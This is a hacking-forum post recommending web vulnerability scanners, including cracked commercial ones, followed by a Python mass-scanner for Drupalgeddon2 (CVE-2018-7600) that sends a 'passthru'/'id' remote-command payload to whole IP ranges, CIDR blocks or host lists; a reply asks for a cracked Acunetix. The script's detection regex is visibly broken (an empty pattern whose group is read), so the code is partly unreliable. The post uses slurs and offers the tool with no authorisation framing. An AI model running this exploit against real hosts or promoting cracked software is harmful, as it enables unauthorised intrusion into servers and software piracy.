Sign in to follow this  
mesvak

DIFF WAYS FOR FINDING VULN OF SITES (SCANNERS)

Recommended Posts

WELP THE THING THAT I CAN SAY IT IS THERE ARE INFINITE METHODS AND SCANNERS WRITTEN IN DIFF LANGS 

HERE I WILL GO AHEAD AND STRAIGHTLY HIT THE POT 

 

 

1-ACOUNTIX WELP AS ALL OF  U MIGHT OR MIGHT NOT NO ABOUT THIS SHIT THIS IS KINDA GOOD SHIT FOR FINDING VULN AND EXPLOITS (XSS, LFI, CRLF, SQL, SHELLS, EXPLOITS,...)

 

 

 

2-PYMAP SCANNER (https://github.com/azizaltuntas/Pymap-Scanner)

TAKE A LOOK AT it's NOT BAD  

 

 

3-WAPITI  tbh I had fun with this gay tool and it's perfect, and I can say the privileges are  injecting xxe,XSS,crlf,XPath and one HQ shit executing commands ooooof 

its gud idk whether you can find the new version or something like this now cause used it like one year ago (version 3 )

 

(Generates vulnerability reports in various formats (HTMLXMLJSONTXT

    Can suspend and resume a scan or an attack

    Can give you colors in the terminal to highlight vulnerabilities

    Different levels of verbosity

    Adding a payload can be as easy as adding a line to a text file

    Support HTTP and HTTPS proxies

    Authentication via several methods: BasicDigestKerberos or NTLM

    Ability to restrain the scope of the scan (domainfolderwebpage)

    Safeguards against scan endless-loops (max number of values for a parameter)

    Can exclude some URLs of the scan and attacks (e.g.logout URL)

    Extract URLs from Flash SWF files

    Try to extract URLs from javascript (very basic JS interpreter)

)

 

 

4-damn fucking freaky vuln finder oooof such a significant one 3 years ago I can say one of the first apps I tried 

https://github.com/ethicalhack3r/DVWA  welp one suggestion don't use it on your devices or whatsoever go on RDP or open it on virtual box, and tbh it's not useful anymore I don't think so 

 

5-https://github.com/almandin/fuxploider   fuxploider written on python  not bad didn't work too much with this one 

 

 

6-netsparker this is so good cz its updatable and the new version got cracked ezily, so its good to have a look version 

I have version 5 .000. something   its kinda good but I don't use it tbh 

 

7-sqlmap it's fucked up but for the beginning is good but in the while it would get fucking boring and so shitty af  i would rather do it by my hands then trusting this or do it with multiple shits like acuntix and sqlmap and one more 

 

8-https://github.com/zigoo0/webpwn3r  begining of my learning to get the py out of shit was with this not only this but yeah it helped me so this is gud and its simple only three files one is gay and other 2 are simple just understand the

main one and u will get how to code something like a scanner ....

 

 

 

And there are some more like z3nom & zarp ....... 

but tbh i would suggest you guys to code the scanner by ur own gay hands  its not big deal tbh as you can see all of em are just to ez to be coded just lil bit training 

 

one code which is rly good to have a look 

 

#written by gay hands msv 

import argparse
import ipaddress
import itertools
import re
import requests
import sys
import time

#functions  niga 
def exploit(ip_targets):
   send_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'id', 'name[#type]':'markup'}
   send_data = {'form_id':'user_pass', '_triggering_element_name':'name'}
   ipregex = re.compile("(\d{1,3}\.){3}\d{1,3}.*")
   num_scanned = len(ip_targets)
   num_vuln = 0
   time_start = time.time()
   for ip_target in ip_targets:
       result = ipregex.match(ip_target)
       ip_target = "http://"+ip_target
       if result is not None:
           r = None
           print("{:=<74}".format(""))
           print("[~] {:<60} [{:^7}]".format(ip_target, "..."), end="", flush=True)
           if verbose == True:
               try:
                   r = requests.post(ip_target, data=send_data, params=send_params, timeout=3)
               except requests.exceptions.Timeout:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   print("{:>7} ERROR: Server seems to be down (Timeout)".format("--"))
                   continue
               except requests.exceptions.ConnectionError:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   print("{:>7} ERROR: Unable to connect to the webserver (Connection Error)".format("--"))
                   continue
               except requests.exceptions.HTTPError:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   print("{:>7} ERROR: 4xx/5xx".format("--"))
                   continue
               except requests.exceptions.InvalidURL:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   print("{:>7} ERROR: Invalid URL.".format("--"))
                   continue
               except Exception:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   print("{:>7} ERROR: Unexpected Error".format("--"))
                   sys.exit()
               else: 
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "OK"))
                   print("{:>7} OK: Alive".format("--"))
           else:
               try:
                   r = requests.post(ip_target, data=send_data, params=send_params, timeout=5)
               except Exception:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR"))
                   continue
               else:
                   print("\r[~] {:<60} [{:^7}]".format(ip_target, "OK"))

           #Finding block of data to check server type ffs
           m = re.search(r'', r.text)
           if m:
               if verbose == True:
                   print("{:>7} OK: Server seems to be running Drupal".format("--"))
               found = m.group(1)
               send_params2 = {'q':'file/ajax/name/#value/' + found}
               send_data2 = {'form_build_id':found}
               r = requests.post(ip_target, data=send_data2, params=send_params2)
               r.encoding = 'ISO-8859-1'
               out = r.text.split("[{")[0].strip()
               if out == "":
                   print("{:>7} Patched (CVE-2018-7600)".format("--"))
                   continue
               else: 
                   print("{:>7} Vulnerable (CVE-2018-7600)".format("--"))
                   num_vuln += 1
           else:
               print("{:>7} Doesnt seem like a Drupal server?".format("--"))
               continue
       else:
           raise ValueError("Invalid IP Address")
   time_fin = time.time()
   print("{:=<74}".format(""))
   print("[+] {} target(s) scanned, {} target(s) vulnerable (CVE-2018-7600)".format(num_scanned, num_vuln))
   print("[+] Scan completed in {:.3f} seconds".format(time_fin-time_start))

def process_file(target):
   hostlist = []
   try:
       file = open(target, "r")
       for line in file:
           hostlist.append(line.strip())
       exploit(hostlist)
   except FileNotFoundError:
       print("[!] Unable to locate file. Check file path.")
       sys.exit()
   except ValueError:
       print("[!] Invalid value in file. Ensure only IPv4 addresses exist!")
       sys.exit()
   except Exception as e:
       print(e)
       print("[!] Unexpected Error! contact me niba ")
       sys.exit()

def process_multiple(target):
   hostlist = target.split(",")
   try:
       for data in hostlist:
           data = data.strip()
       exploit(hostlist)
   except ValueError:
       print("[!] Invalid Input. Only IPv4 addresses are accepted.")
       sys.exit()
   except Exception:
       print("[!] Unexpected Error! contact me niba ")
       sys.exit()

def process_range(target):
   try:
       hostlist = []
       raw_octets = target.split(".")
       octets = [x.strip().split("-") for x in raw_octets]
       octet_range = [range(int(x[0]), int(x[1])+1) if len(x) == 2 else x for x in octets]
       for x in itertools.product(*octet_range):
           hostlist.append('.'.join(map(str,x)).strip())
       exploit(hostlist)
   except ValueError:
       print("[!] Invalid Input. Only IPv4 ranges are accepted.")
       sys.exit()
   except Exception as e:
       print(e)
       print("Unexpected Errror")
       sys.exit()

def process_ip(target):
   try:
       exploit([target.strip()])
   except ValueError:
       print("[!] Invalid Input. Only IPv4 & valid CIDR addresses are accepted for IP mode.\n{:>7} Use -h to see other modes.".format("--"))
       sys.exit()
   except Exception:
       print("[!] Unexpected Error   contact me niba ")
       sys.exit()

def process_cidr(target):
   hostlist = []
   try:
       net = ipaddress.ip_network(target.strip(), strict=False)
       for host in net.hosts():
           hostlist.append(str(host))
       exploit(hostlist)
   except ValueError:
       print("[!] Invalid Input. Only IPv4 & valid CIDR addresses are accepted for IP mode.\n{:>7} Use -h to see other modes.".format("--"))
       sys.exit()
   except Exception:
       print("[!] Unexpected Error      contact me niba ")
       sys.exit()

#main here
def main():
   parser = argparse.ArgumentParser(prog="drupalgeddon2-scan.py",
   formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50))
   try:
       parser.add_argument("target", help="IP of target site(s)")
       parser.add_argument('-c', "--cidr", default=False, action="store_true", help="Generate & scan a range given a CIDR address")
       parser.add_argument('-f', "--file", default=False, action="store_true", help="Retrieve IP Addresses from a file (1 per line)")
       parser.add_argument('-i', "--ip", default=True, action="store_true", help="Single IP Address (CIDR migrated to a seperate mode)")
       parser.add_argument('-m', "--multiple", default=False, action="store_true", help="Multiple IP Adddress e.g. 192.168.0.1,192.168.0.2,192.168.0.3")
       parser.add_argument('-r', "--range", default=False, action="store_true", help="IP Range e.g. 192.168.1-2.0-254 (nmap format)")
       parser.add_argument('-v', "--verbose", default=False, action="store_true", help="Provide a more verbose display")
       parser.add_argument("-o", "--http-only", default=False, action="store_true", help="To be implemented (Current state, https not implemented)")
       parser.add_argument("-s", "--https-only", default=False, action="store_true", help="To be implemented")
   except Exception:
       print("[!] Unexpected Error! contact me niba ")
       sys.exit()
   try:
       args, u = parser.parse_known_args()
   except Exception:
       print("[!] Invalid arguments!")
       sys.exit()

   #renaming variable
   global verbose 
   verbose = args.verbose

   #Verbose message
   print("[~] Starting scan...")

   #IP range in a CIDR format
   if args.cidr == True:
       process_cidr(args.target)

   #IPs from a file
   elif args.file == True:
       process_file(args.target)

   #Multiple IPs (separated w commas)
   elif args.multiple == True:
       process_multiple(args.target)

   #IP Range (start-end)
   elif args.range == True:
       process_range(args.target)

   #IP Address/CIDR
   elif args.ip == True:
       process_ip(args.target)
       
   #Unrecognised arguments
   else:
       print("[!] Unexpected Outcome!   contact me niba ")
       sys.exit()
   sys.exit()

#ifmain here
if __name__ == "__main__":
   try:
       main()
   except KeyboardInterrupt:
       print ("\n-- Ctrl+C caught. Terminating program.")
   except Exception as e:
       print(e)
       print("[!] Unexpected Error!   contact me niba ")

Share this post


Link to post
Share on other sites

Good post, my friend. Would love to get a good cracked version of Acunetix.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this